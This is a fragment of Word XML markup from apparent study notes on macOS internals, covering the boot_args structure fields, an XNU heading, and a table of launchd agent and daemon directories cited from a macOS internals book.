    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    </w:t>
      </w:r>
      <w:r w:rsidRPr="00885882">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>deviceTreeP</w:t>
      </w:r>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;      /* Physical address of flattened device tree */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    deviceTreeLength; /* Length of flattened tree */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    kaddr;            /* Physical address of beginning of kernel text */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    ksize;            /* Size of combined kernel text+data+efi */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    efiRuntimeServicesPageStart; /* physical address of defragmented runtime pages */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    efiRuntimeServicesPageCount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint64_t    efiRuntimeServicesVirtualPageStart; /* virtual address of defragmented runtime pages */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    </w:t>
      </w:r>
      <w:r w:rsidRPr="00885882">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>efiSystemTable</w:t>
      </w:r>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;   /* physical address of system table in runtime area */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    kslide;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    performanceDataStart; /* physical address of log */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    performanceDataSize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    keyStoreDataStart; /* physical address of key store data */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    keyStoreDataSize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint64_t    bootMemStart;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint64_t    bootMemSize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint64_t    PhysicalMemorySize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint64_t    FSBFrequency;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint64_t    pciConfigSpaceBaseAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    uint32_t    pciConfigSpaceStartBusNumber;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    pciConfigSpaceEndBusNumber;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    csrActiveConfig;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    csrPendingConfig;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    __reserved4[728];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>} boot_args;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00467FD0" w:rsidRPr="006B4005" w:rsidRDefault="00467FD0" w:rsidP="00467FD0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc445313219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XNU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00467FD0" w:rsidRDefault="00981AC6" w:rsidP="00981AC6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981AC6">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>THE KERNEL MUST INITIALIZE ITS VARIOUS SUBSYSTEMS, BEFORE KICKING OFF THE USER MODE PORTION OF THE OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002561F3" w:rsidRDefault="007F3BC9" w:rsidP="002561F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002561F3" w:rsidRPr="002561F3" w:rsidRDefault="007F3BC9" w:rsidP="002561F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="006B4005" w:rsidRDefault="009F6926" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc445313220"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Launchd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRDefault="004106D2" w:rsidP="00BA026A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="009F6926" w:rsidRPr="009F6926">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://launchd.info/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00777FD0" w:rsidRPr="009F6926" w:rsidRDefault="00D6693E" w:rsidP="00BA026A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/var/db/launchd.db/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>*.pli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4135"/>
        <w:gridCol w:w="2633"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidTr="009F6926">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCE3FF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
            <w:pPr>
              <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6926">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCE3FF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
            <w:pPr>
              <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6926">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCE3FF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
            <w:pPr>
              <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6926">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Run on behalf of</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidTr="009F6926">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User Agent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Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>~/Library/LaunchAgent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Currently logged in user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidTr="009F6926">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Global Agents</w:t>
            </w:r>
          </w:p>
        </w:tc>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Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>/Library/LaunchAgents</w:t>
            </w:r>
          </w:p>
        </w:tc>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Currently logged in user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidTr="009F6926">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Global Daemon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Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>/Library/LaunchDaemon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root or the user specified with the key </w:t>
            </w:r>
            <w:r w:rsidRPr="009F6926">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="E1D7FF"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidTr="009F6926">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System Agents</w:t>
            </w:r>
          </w:p>
        </w:tc>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Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>/System/Library/LaunchAgents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF4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Currently logged in user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidTr="009F6926">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System Daemon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Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>/System/Library/LaunchDaemons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FAFDFF"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
            <w:pPr>
              <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6926">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>root or the user specified with the key </w:t>
            </w:r>
            <w:r w:rsidRPr="009F6926">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="29"/>
                <w:shd w:val="clear" w:color="auto" w:fill="E1D7FF"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009F6926" w:rsidRDefault="009F6926" w:rsidP="00BA026A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="00BA026A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mac OS X and iOS Internals, To the Apple's Core.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TABLE 7-1: Launch Daemon locations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="ProximaNova-Bold" w:eastAsia="ProximaNova-Bold" w:cs="ProximaNova-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ProximaNova-Bold" w:eastAsia="ProximaNova-Bold" w:cs="ProximaNova-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>DIRECTORY USED FOR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6926" w:rsidRPr="009F6926" w:rsidRDefault="009F6926" w:rsidP="009F6926">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/System/Library/LaunchDaemons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Daemon plist fi</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>les, primarily those belonging to the system</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6926">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>itself.</w:t>
      </w:r>
    </w:p>
